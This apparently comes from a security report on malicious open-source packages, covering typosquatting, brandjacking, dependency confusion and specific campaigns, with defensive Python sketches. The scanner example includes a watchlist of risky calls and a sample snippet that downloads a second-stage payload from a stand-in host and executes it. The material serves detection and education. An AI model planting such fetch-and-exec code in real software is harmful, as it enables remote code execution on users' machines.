Malicious software packages have always been a security concern, especially in corporate environments. Over the past year, there has been a large increase in the amount of malware spread through open-source package platforms: in the first quarter of 2023 alone, approximately 6,800 malicious packages were identified. Hundreds of thousands of users downloaded malicious packages throughout the year. The top five malicious package campaigns of the year alone led to 300,000 downloads and potential infections.
Python .py files now constitute 7% of the malicious files downloaded from the internet, compared to only 3% in our previous annual report. These packages spread via several common attack vectors, such as package name typosquatting, package brandjacking, and dependency confusion attacks. This trend emphasizes the importance of code legitimacy verification, especially for code written by unknown software developers.
During the software development process, programmers often use pre-existing packages from code-sharing sources that contain the functionality they need. This widespread practice has several advantages, including reducing the time required to write code and to come up with solutions to complex problems. In most cases, pre-existing code performs efficiently and has already been tested for bugs and edge cases. As a result, many open-source libraries and packages are available in every programming language.
The use of open-source libraries and packages raises several security concerns that can be exploited by threat actors. Due to the nature of open-source libraries, anyone can contribute and upload their code, making it difficult to track and verify shared code. A prime example is PyPI (Python Package Index), which is the main repository of software packages for the Python programming language. Despite recent attempts to mitigate these threats, PyPI heavily relies on user reports to ensure package security. Often, by the time they are reported and removed, the malicious packages may already have hundreds of downloads.
Most programmers do not check the integrity of open-source code before they add it to their own. It is challenging to understand the flow of code written by someone else, especially if it contains thousands of lines. In many cases, programmers are not aware of all possible security risks inherent in a piece of code, and even if they review it, they might miss malicious artifacts.
These malicious components can infect target networks, steal and exfiltrate sensitive information such as passwords and credit card information, and download additional malware components.
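Because manual review of a large package is easy to get wrong, a simple automated pass can at least point a reviewer at the lines worth reading first. The following is a minimal sketch, not a real detection engine: it parses Python source without executing it and flags a few call names that commonly appear in install-time droppers. The watchlist `SUSPICIOUS_CALLS`, the helper names, and the sample snippet are all illustrative assumptions.

```python
import ast

# Hypothetical watchlist: call names that often deserve a closer look in
# install-time code. It is illustrative, not a complete detection rule set.
SUSPICIOUS_CALLS = {
    "eval",
    "exec",
    "os.system",
    "subprocess.Popen",
    "subprocess.run",
    "urllib.request.urlopen",
}


def dotted_name(node):
    """Return 'a.b.c' for Name/Attribute chains, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_suspicious_calls(source):
    """Parse source (without executing it) and list (line, call_name) hits."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)


# Made-up snippet resembling a downloader: fetch a second stage, then run it.
sample = '''
import os, urllib.request
payload = urllib.request.urlopen("http://example.invalid/stage2").read()
exec(payload)
'''

for line, name in find_suspicious_calls(sample):
    print(f"line {line}: {name}")
```

A check like this is easy to evade, for example by importing a function under an alias or by obfuscating strings, so it can only supplement code review rather than replace it.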
Creating a malicious open-source package is often straightforward and can have a significant impact. In this type of attack, the threat actor targets not only the developer who downloads the malicious package, but also the developer’s customers who use their trusted software, thus precipitating a software supply-chain attack.
Over the years, several prominent attack vectors for open-source software package platforms were developed by threat actors and proven feasible by security researchers. The most common one is typosquatting. In this type of attack, the threat actor publishes malicious packages with slightly misspelled names or variations of popular legitimate packages, in the hope that a user will unintentionally download the malicious version. Packages are typically installed using a command such as “package_manager_name install package_name”, for example, “npm install async”. Therefore, a small mistake in the package name can unknowingly result in the installation of a malicious package.
In June 2023, researchers uncovered a campaign containing over 160 malicious Python packages that had over 45,000 downloads. The threat actor uploaded Python packages resembling some of the most popular packages. Among them was a malicious package called “reaquests”, designed to mimic the Python package “requests” that is widely used for HTTP request operations by millions of users.
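One way to catch this kind of mistake before installation is to compare a requested name against a list of packages the team actually intends to use. The sketch below uses Python's standard `difflib` module for the comparison. The `POPULAR_PACKAGES` list, the function name, and the 0.85 similarity cutoff are assumptions chosen for illustration, not values taken from any registry or tool.

```python
import difflib

# Illustrative list; a real one would come from the project's vetted dependencies.
POPULAR_PACKAGES = ["requests", "numpy", "pandas", "prettytable"]


def possible_typosquat(name, known=POPULAR_PACKAGES, cutoff=0.85):
    """Return the known package that `name` closely resembles, or None.

    An exact match is treated as legitimate and returns None.
    """
    candidate = name.lower()
    if candidate in known:
        return None
    matches = difflib.get_close_matches(candidate, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None


print(possible_typosquat("reaquests"))  # requests
print(possible_typosquat("requests"))   # None
```

This only flags near-misspellings. A malicious package whose name does not closely resemble a known one would pass the check unnoticed.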
Python libraries are not the only target: any repository built on open-source code sharing can be abused. The NuGet repository, an open-source package manager and software distribution system for .NET libraries, was used to launch a significant typosquatting campaign. The fraudulent packages were downloaded over 150,000 times in a single month before they were removed from the NuGet repository. The malicious packages contained a PowerShell script that was executed upon installation and triggered a download of a second-stage payload. The final payload was a custom crypto stealer called “Impala Stealer”, which steals user credentials for cryptocurrency exchange platforms.
Cybercriminals don’t just exploit typos to deliver malicious packages. In package brandjacking, the threat actor creates malicious packages with the same names as the legitimate ones in the hopes of fooling users into downloading them.
In a recent attack against Mac computers, threat actors created a malicious version of the crypto library Cobo Custody Restful to deploy malware. The malicious version had the same name as the legitimate one and was stored in the PyPI registry. The threat actors took advantage of the fact that this package does not have an official distribution through the PyPI registry and is distributed only via GitHub. If the installation source is not explicitly specified, the pip package installer prioritizes the malicious PyPI version over the legitimate GitHub version.
It’s not only package management platforms that are exploited. Threat actors also try to take over legitimate accounts on platforms that host open-source code, such as GitHub, to add malicious code to legitimate packages. This method was demonstrated by researchers who took over a popular NPM package with more than 3.5 million weekly downloads by acquiring an expired domain name associated with one of the package maintainers. The recovered domain allowed them to reset the GitHub password, making it possible to publish Trojanized versions of the NPM packages.
In contrast with package brandjacking, dependency confusion attacks trick the package manager instead of the user. The threat actor exploits a vulnerability in the way that many package managers download dependencies during a software build process. The attacker publishes a package on a public repository under the same name as a package that the victim hosts in a private repository. This tricks the software installer script into pulling the malicious code files from the public repository instead of the original ones. A research report from April 2023 states that 49% of all organizations are vulnerable to this attack vector.
Earlier this year, security researchers discovered that PyTorch, a widely used machine-learning framework developed by Meta Platforms, had been compromised. The attack began when a threat actor uploaded a malicious package to the PyPI repository with the same name as the legitimate package and a higher version number, causing dependency confusion. This attack affected thousands of machines and resulted in information theft.
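The role of the higher version number can be illustrated with a toy model. The sketch below is not how pip or any other package manager actually resolves dependencies. It only contrasts a resolver that picks the highest version from any index with one restricted to a trusted index. The package name `acme-billing`, the index labels, and the version numbers are hypothetical.

```python
def parse_version(text):
    """Turn a simple dotted version such as '1.4.0' into (1, 4, 0)."""
    return tuple(int(part) for part in text.split("."))


def naive_resolve(candidates):
    """Pick the highest version regardless of which index it came from."""
    return max(candidates, key=lambda c: parse_version(c["version"]))


def pinned_resolve(candidates, trusted_index):
    """Only consider candidates served by the trusted index."""
    trusted = [c for c in candidates if c["index"] == trusted_index]
    if not trusted:
        raise LookupError(f"no candidate available from {trusted_index}")
    return max(trusted, key=lambda c: parse_version(c["version"]))


# Hypothetical internal package visible on two indexes under the same name.
candidates = [
    {"name": "acme-billing", "version": "1.4.0", "index": "private"},
    {"name": "acme-billing", "version": "99.0.0", "index": "public"},
]

print(naive_resolve(candidates)["index"])              # public
print(pinned_resolve(candidates, "private")["index"])  # private
```

In this model the attacker wins simply by publishing a larger version number. Restricting each internal name to a single trusted source removes that lever.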
Malicious open-source packages are used by both prolific threat actors and state-sponsored actors. One such attack was attributed to the infamous North Korean group Lazarus. In August 2023, the group uploaded several malicious packages to the PyPI repository. They camouflaged one of the packages as a VMware vSphere connector module named “vConnector”. Another package mimicked “prettytable”, a popular Python tool for printing tables in an attractive ASCII format. The legitimate package “prettytable” has more than 9 million monthly downloads, while the malicious version “tablediter” received 736 downloads.
In addition, Check Point researchers have observed malware tailored for the PyPI registry being distributed on Russian-language underground forums. Its availability allows attackers to launch attacks easily and without prior warning.
The spread of malicious packages in open-source software repositories is a growing concern that requires heightened attention and proactive measures from both developers and users. While the benefits of open-source software are undeniable, the rising wave of attacks such as typosquatting, brandjacking, and dependency confusion reveals the limitations of these platforms. The ease of exploiting package management platforms like PyPI, NPM, and NuGet underscores the critical need for enhanced security protocols and thorough code review practices. Developers must prioritize security to protect end-users from the consequences of these malicious infiltrations.